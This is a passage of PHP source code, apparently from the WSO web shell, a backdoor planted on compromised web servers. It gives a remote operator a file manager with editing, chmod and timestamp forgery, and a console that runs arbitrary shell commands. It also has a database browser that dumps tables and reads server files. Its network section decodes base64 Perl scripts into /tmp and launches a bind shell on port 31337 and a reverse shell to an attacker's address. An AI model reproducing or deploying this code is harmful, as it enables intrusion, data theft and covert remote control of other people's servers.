    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; 
595
    if( empty($_POST['p2']) ) 
596
        $_POST['p2'] = 'view'; 
597
    if( is_file($_POST['p1']) ) 
598
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
599
    else
600
        $m = array('Chmod', 'Rename', 'Touch'); 
601
    foreach($m as $v) 
602
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; 
603
    echo '<br><br>'; 
604
    switch($_POST['p2']) { 
605
        case 'view': 
606
            echo '<pre class=ml1>'; 
607
            $fp = @fopen($_POST['p1'], 'r'); 
608
            if($fp) { 
609
                while( !@feof($fp) ) 
610
                    echo htmlspecialchars(@fread($fp, 1024)); 
611
                @fclose($fp); 
612
            } 
613
            echo '</pre>'; 
614
            break; 
615
        case 'highlight': 
616
            if( @is_readable($_POST['p1']) ) { 
617
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; 
618
                $code = @highlight_file($_POST['p1'],true); 
619
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; 
620
            } 
621
            break; 
622
        case 'chmod': 
623
            if( !empty($_POST['p3']) ) { 
624
                $perms = 0; 
625
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 
626
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
627
                if(!@chmod($_POST['p1'], $perms)) 
628
                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; 
629
            } 
630
            clearstatcache(); 
631
            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; 
632
            break; 
633
        case 'edit': 
634
            if( !is_writable($_POST['p1'])) { 
635
                echo 'File isn\'t writeable'; 
636
                break; 
637
            } 
638
            if( !empty($_POST['p3']) ) { 
639
                $time = @filemtime($_POST['p1']); 
640
                $_POST['p3'] = substr($_POST['p3'],1); 
641
                $fp = @fopen($_POST['p1'],"w"); 
642
                if($fp) { 
643
                    @fwrite($fp,$_POST['p3']); 
644
                    @fclose($fp); 
645
                    echo 'Saved!<br><script>p3_="";</script>'; 
646
                    @touch($_POST['p1'],$time,$time); 
647
                } 
648
            } 
649
            echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; 
650
            $fp = @fopen($_POST['p1'], 'r'); 
651
            if($fp) { 
652
                while( !@feof($fp) ) 
653
                    echo htmlspecialchars(@fread($fp, 1024)); 
654
                @fclose($fp); 
655
            } 
656
            echo '</textarea><input type=submit value=">>"></form>'; 
657
            break; 
658
        case 'hexdump': 
659
            $c = @file_get_contents($_POST['p1']); 
660
            $n = 0; 
661
            $h = array('00000000<br>','',''); 
662
            $len = strlen($c); 
663
            for ($i=0; $i<$len; ++$i) { 
664
                $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
665
                switch ( ord($c[$i]) ) { 
666
                    case 0:  $h[2] .= ' '; break; 
667
                    case 9:  $h[2] .= ' '; break; 
668
                    case 10: $h[2] .= ' '; break; 
669
                    case 13: $h[2] .= ' '; break; 
670
                    default: $h[2] .= $c[$i]; break; 
671
                } 
672
                $n++; 
673
                if ($n == 32) { 
674
                    $n = 0; 
675
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} 
676
                    $h[1] .= '<br>'; 
677
                    $h[2] .= "\n"; 
678
                } 
679
            } 
680
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; 
681
            break; 
682
        case 'rename': 
683
            if( !empty($_POST['p3']) ) { 
684
                if(!@rename($_POST['p1'], $_POST['p3'])) 
685
                    echo 'Can\'t rename!<br>'; 
686
                else
687
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); 
688
            } 
689
            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; 
690
            break; 
691
        case 'touch': 
692
            if( !empty($_POST['p3']) ) { 
693
                $time = strtotime($_POST['p3']); 
694
                if($time) { 
695
                    if(!touch($_POST['p1'],$time,$time)) 
696
                        echo 'Fail!'; 
697
                    else
698
                        echo 'Touched!'; 
699
                } else echo 'Bad time format!'; 
700
            } 
701
            clearstatcache(); 
702
            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; 
703
            break; 
704
    } 
705
    echo '</div>'; 
706
    wsoFooter(); 
707
}
708
  
709
function actionConsole() { 
710
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) { 
711
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true; 
712
        $_POST['p1'] .= ' 2>&1'; 
713
    } elseif(!empty($_POST['p1'])) 
714
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false; 
715
  
716
    if(isset($_POST['ajax'])) { 
717
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
718
        ob_start(); 
719
        echo "d.cf.cmd.value='';\n"; 
720
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); 
721
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { 
722
            if(@chdir($match[1])) { 
723
                $GLOBALS['cwd'] = @getcwd(); 
724
                echo "c_='".$GLOBALS['cwd']."';"; 
725
            } 
726
        } 
727
        echo "d.cf.output.value+='".$temp."';"; 
728
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; 
729
        $temp = ob_get_clean(); 
730
        echo strlen($temp), "\n", $temp; 
731
        exit; 
732
    } 
733
    wsoHeader(); 
734
    echo "<script> 
735
if(window.Event) window.captureEvents(Event.KEYDOWN); 
736
var cmds = new Array(''); 
737
var cur = 0; 
738
function kp(e) { 
739
    var n = (window.Event) ? e.which : e.keyCode; 
740
    if(n == 38) { 
741
        cur--; 
742
        if(cur>=0) 
743
            document.cf.cmd.value = cmds[cur]; 
744
        else
745
            cur++; 
746
    } else if(n == 40) { 
747
        cur++; 
748
        if(cur < cmds.length) 
749
            document.cf.cmd.value = cmds[cur]; 
750
        else
751
            cur--; 
752
    } 
753
} 
754
function add(cmd) { 
755
    cmds.pop(); 
756
    cmds.push(cmd); 
757
    cmds.push(''); 
758
    cur = cmds.length-1; 
759
} 
760
  
761
</script>"; 
762
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;">'; 
763
    
764
	if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
765
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
766
    echo '</select><nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; 
767
    if(!empty($_POST['p1'])) { 
768
        echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); 
769
    } 
770
    echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; 
771
    echo '</form></div><script>d.cf.cmd.focus();</script>'; 
772
    wsoFooter(); 
773
} 
774
  
775
function actionSql() { 
776
    class DbClass { 
777
        var $type; 
778
        var $link; 
779
        var $res; 
780
        function DbClass($type) { 
781
            $this->type = $type; 
782
        } 
783
        function connect($host, $user, $pass, $dbname){ 
784
            switch($this->type)  { 
785
                case 'mysql': 
786
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; 
787
                    break; 
788
                case 'pgsql': 
789
                    $host = explode(':', $host); 
790
                    if(!$host[1]) $host[1]=5432; 
791
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
792
                    break; 
793
            } 
794
            return false; 
795
        } 
796
        function selectdb($db) { 
797
            switch($this->type)  { 
798
                case 'mysql': 
799
                    if (@mysql_select_db($db))return true; 
800
                    break; 
801
            } 
802
            return false; 
803
        } 
804
        function query($str) { 
805
            switch($this->type) { 
806
                case 'mysql': 
807
                    return $this->res = @mysql_query($str); 
808
                    break; 
809
                case 'pgsql': 
810
                    return $this->res = @pg_query($this->link,$str); 
811
                    break; 
812
            } 
813
            return false; 
814
        } 
815
        function fetch() { 
816
            $res = func_num_args()?func_get_arg(0):$this->res; 
817
            switch($this->type)  { 
818
                case 'mysql': 
819
                    return @mysql_fetch_assoc($res); 
820
                    break; 
821
                case 'pgsql': 
822
                    return @pg_fetch_assoc($res); 
823
                    break; 
824
            } 
825
            return false; 
826
        } 
827
        function listDbs() { 
828
            switch($this->type)  { 
829
                case 'mysql': 
830
                        return $this->query("SHOW databases"); 
831
                break; 
832
                case 'pgsql': 
833
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); 
834
                break; 
835
            } 
836
            return false; 
837
        } 
838
        function listTables() { 
839
            switch($this->type)  { 
840
                case 'mysql': 
841
                    return $this->res = $this->query('SHOW TABLES'); 
842
                break; 
843
                case 'pgsql': 
844
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); 
845
                break; 
846
            } 
847
            return false; 
848
        } 
849
        function error() { 
850
            switch($this->type)  { 
851
                case 'mysql': 
852
                    return @mysql_error(); 
853
                break; 
854
                case 'pgsql': 
855
                    return @pg_last_error(); 
856
                break; 
857
            } 
858
            return false; 
859
        } 
860
        function setCharset($str) { 
861
            switch($this->type)  { 
862
                case 'mysql': 
863
                    if(function_exists('mysql_set_charset')) 
864
                        return @mysql_set_charset($str, $this->link); 
865
                    else
866
                        $this->query('SET CHARSET '.$str); 
867
                    break; 
868
                case 'pgsql': 
869
                    return @pg_set_client_encoding($this->link, $str); 
870
                    break; 
871
            } 
872
            return false; 
873
        } 
874
        function loadFile($str) { 
875
            switch($this->type)  { 
876
                case 'mysql': 
877
                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); 
878
                break; 
879
                case 'pgsql': 
880
                    $this->query("CREATE TABLE wso1(file text);COPY wso1 FROM '".addslashes($str)."';select file from wso1;"); 
881
                    $r=array(); 
882
                    while($i=$this->fetch()) 
883
                        $r[] = $i['file']; 
884
                    $this->query('drop table wso1'); 
885
                    return array('file'=>implode("\n",$r)); 
886
                break; 
887
            } 
888
            return false; 
889
        } 
890
        function dump($table, $fp = false) { 
891
            switch($this->type)  { 
892
                case 'mysql': 
893
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); 
894
                    $create = mysql_fetch_array($res); 
895
                    $sql = $create[1].";\n"; 
896
                    if($fp) fwrite($fp, $sql); else echo($sql); 
897
                    $this->query('SELECT * FROM `'.$table.'`'); 
898
                    $head = true; 
899
                    while($item = $this->fetch()) { 
900
                        $columns = array(); 
901
                        foreach($item as $k=>$v) { 
902
                            if($v == null) 
903
                                $item[$k] = "NULL"; 
904
                            elseif(is_numeric($v)) 
905
                                $item[$k] = $v; 
906
                            else
907
                                $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
908
                            $columns[] = "`".$k."`"; 
909
                        } 
910
                        if($head) { 
911
                            $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; 
912
                            $head = false; 
913
                        } else
914
                            $sql = "\n\t,(".implode(", ", $item).')'; 
915
                        if($fp) fwrite($fp, $sql); else echo($sql); 
916
                    } 
917
                    if(!$head) 
918
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); 
919
                break; 
920
                case 'pgsql': 
921
                    $this->query('SELECT * FROM '.$table); 
922
                    while($item = $this->fetch()) { 
923
                        $columns = array(); 
924
                        foreach($item as $k=>$v) { 
925
                            $item[$k] = "'".addslashes($v)."'"; 
926
                            $columns[] = $k; 
927
                        } 
928
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
929
                        if($fp) fwrite($fp, $sql); else echo($sql); 
930
                    } 
931
                break; 
932
            } 
933
            return false; 
934
        } 
935
    }; 
936
    $db = new DbClass($_POST['type']); 
937
    if(@$_POST['p2']=='download') { 
938
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
939
        $db->selectdb($_POST['sql_base']); 
940
        switch($_POST['charset']) { 
941
            case "Windows-1251": $db->setCharset('cp1251'); break; 
942
            case "UTF-8": $db->setCharset('utf8'); break; 
943
            case "KOI8-R": $db->setCharset('koi8r'); break; 
944
            case "KOI8-U": $db->setCharset('koi8u'); break; 
945
            case "cp866": $db->setCharset('cp866'); break; 
946
        } 
947
        if(empty($_POST['file'])) { 
948
            ob_start("ob_gzhandler", 4096); 
949
            header("Content-Disposition: attachment; filename=dump.sql"); 
950
            header("Content-Type: text/plain"); 
951
            foreach($_POST['tbl'] as $v) 
952
                $db->dump($v); 
953
            exit; 
954
        } elseif($fp = @fopen($_POST['file'], 'w')) { 
955
            foreach($_POST['tbl'] as $v) 
956
                $db->dump($v, $fp); 
957
            fclose($fp); 
958
            unset($_POST['p2']); 
959
        } else
960
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); 
961
    } 
962
    wsoHeader(); 
963
    echo " 
964
  
965
<h1>Sql browser</h1><div class=content> 
966
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> 
967
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> 
968
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> 
969
<td><select name='type'><option value='mysql' "; 
970
    if(@$_POST['type']=='mysql')echo 'selected'; 
971
echo ">MySql</option><option value='pgsql' "; 
972
if(@$_POST['type']=='pgsql')echo 'selected'; 
973
echo ">PostgreSql</option></select></td> 
974
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td> 
975
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td> 
976
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>"; 
977
    $tmp = "<input type=text name=sql_base value=''>"; 
978
    if(isset($_POST['sql_host'])){ 
979
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
980
            switch($_POST['charset']) { 
981
                case "Windows-1251": $db->setCharset('cp1251'); break; 
982
                case "UTF-8": $db->setCharset('utf8'); break; 
983
                case "KOI8-R": $db->setCharset('koi8r'); break; 
984
                case "KOI8-U": $db->setCharset('koi8u'); break; 
985
                case "cp866": $db->setCharset('cp866'); break; 
986
            } 
987
            $db->listDbs(); 
988
            echo "<select name=sql_base><option value=''></option>"; 
989
            while($item = $db->fetch()) { 
990
                list($key, $value) = each($item); 
991
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
992
            } 
993
            echo '</select>'; 
994
        } 
995
        else echo $tmp; 
996
    }else
997
        echo $tmp; 
998
    echo "</td> 
999
  
1000
                <td><input type=submit value='>>' onclick='fs(d.sf);'></td> 
1001
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> 
1002
            </tr> 
1003
        </table> 
1004
        <script> 
1005
            s_db='".@addslashes($_POST['sql_base'])."'; 
1006
            function fs(f) { 
1007
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; 
1008
                    if(f.p1) f.p1.value=''; 
1009
                    if(f.p2) f.p2.value=''; 
1010
                    if(f.p3) f.p3.value=''; 
1011
                } 
1012
            } 
1013
            function st(t,l) { 
1014
                d.sf.p1.value = 'select'; 
1015
                d.sf.p2.value = t; 
1016
                if(l && d.sf.p3) d.sf.p3.value = l; 
1017
                d.sf.submit(); 
1018
            } 
1019
            function is() { 
1020
                for(i=0;i<d.sf.elements['tbl[]'].length;++i) 
1021
                    d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; 
1022
            } 
1023
        </script>"; 
1024
    if(isset($db) && $db->link){ 
1025
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
1026
            if(!empty($_POST['sql_base'])){ 
1027
                $db->selectdb($_POST['sql_base']); 
1028
                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; 
1029
                $tbls_res = $db->listTables(); 
1030
                while($item = $db->fetch($tbls_res)) { 
1031
                    list($key, $value) = each($item); 
1032
                    if(!empty($_POST['sql_count'])) 
1033
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
1034
                    $value = htmlspecialchars($value); 
1035
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>"; 
1036
                } 
1037
                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; 
1038
                if(@$_POST['p1'] == 'select') { 
1039
                    $_POST['p1'] = 'query'; 
1040
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; 
1041
                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); 
1042
                    $num = $db->fetch(); 
1043
                    $pages = ceil($num['n'] / 30); 
1044
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; 
1045
                    echo " of $pages"; 
1046
                    if($_POST['p3'] > 1) 
1047
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>"; 
1048
                    if($_POST['p3'] < $pages) 
1049
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>"; 
1050
                    $_POST['p3']--; 
1051
                    if($_POST['type']=='pgsql') 
1052
                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
1053
                    else
1054
                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
1055
                    echo "<br><br>"; 
1056
                } 
1057
                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { 
1058
                    $db->query(@$_POST['p2']); 
1059
                    if($db->res !== false) { 
1060
                        $title = false; 
1061
                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; 
1062
                        $line = 1; 
1063
                        while($item = $db->fetch())  { 
1064
                            if(!$title) { 
1065
                                echo '<tr>'; 
1066
                                foreach($item as $key => $value) 
1067
                                    echo '<th>'.$key.'</th>'; 
1068
                                reset($item); 
1069
                                $title=true; 
1070
                                echo '</tr><tr>'; 
1071
                                $line = 2; 
1072
                            } 
1073
                            echo '<tr class="l'.$line.'">'; 
1074
                            $line = $line==1?2:1; 
1075
                            foreach($item as $key => $value) { 
1076
                                if($value == null) 
1077
                                    echo '<td><i>null</i></td>'; 
1078
                                else
1079
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
1080
                            } 
1081
                            echo '</tr>'; 
1082
                        } 
1083
                        echo '</table>'; 
1084
                    } else { 
1085
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
1086
                    } 
1087
                } 
1088
                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; 
1089
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) 
1090
                    echo htmlspecialchars($_POST['p2']); 
1091
                echo "</textarea><br/><input type=submit value='Execute'>"; 
1092
                echo "</td></tr>"; 
1093
            } 
1094
            echo "</table></form><br/>"; 
1095
            if($_POST['type']=='mysql') { 
1096
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); 
1097
                if($db->fetch()) 
1098
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
1099
            } 
1100
            if(@$_POST['p1'] == 'loadfile') { 
1101
                $file = $db->loadFile($_POST['p2']); 
1102
                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; 
1103
            } 
1104
    } else { 
1105
        echo htmlspecialchars($db->error()); 
1106
    } 
1107
    echo '</div>'; 
1108
    wsoFooter(); 
1109
} 
1110
function actionNetwork() { 
1111
    wsoHeader(); 
1112
    $back_connect_p="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"; 
1113
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
1114
    echo "<h1>Network tools</h1><div class=content> 
1115
  
1116
    <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> 
1117
    <span>Bind port to /bin/sh [perl]</span><br/> 
1118
    Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> 
1119
    </form> 
1120
    <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> 
1121
    <span>Back-connect  [perl]</span><br/> 
1122
    Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> 
1123
  
1124
    </form><br>"; 
1125
    if(isset($_POST['p1'])) { 
1126
        function cf($f,$t) { 
1127
            $w = @fopen($f,"w") or @function_exists('file_put_contents'); 
1128
            if($w){ 
1129
                @fwrite($w,@base64_decode($t)); 
1130
                @fclose($w); 
1131
            } 
1132
        } 
1133
        if($_POST['p1'] == 'bpp') { 
1134
            cf("/tmp/bp.pl",$bind_port_p); 
1135
            $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); 
1136
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>"; 
1137
            unlink("/tmp/bp.pl"); 
1138
        } 
1139
        if($_POST['p1'] == 'bcp') { 
1140
            cf("/tmp/bc.pl",$back_connect_p); 
1141
            $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); 
1142
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; 
1143
            unlink("/tmp/bc.pl"); 
1144
        } 
1145
    } 
1146
    echo '</div>'; 
1147
    wsoFooter(); 
1148
}
1149
1150
if( empty($_POST['a']) ) 
1151
    if(isset($default_action) && function_exists('action' . $default_action)) 
1152
        $_POST['a'] = $default_action; 
1153
    else
1154
        $_POST['a'] = 'SecInfo'; 
1155
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 
1156
    call_user_func('action' . $_POST['a']); 
1157
exit; 
1158
?>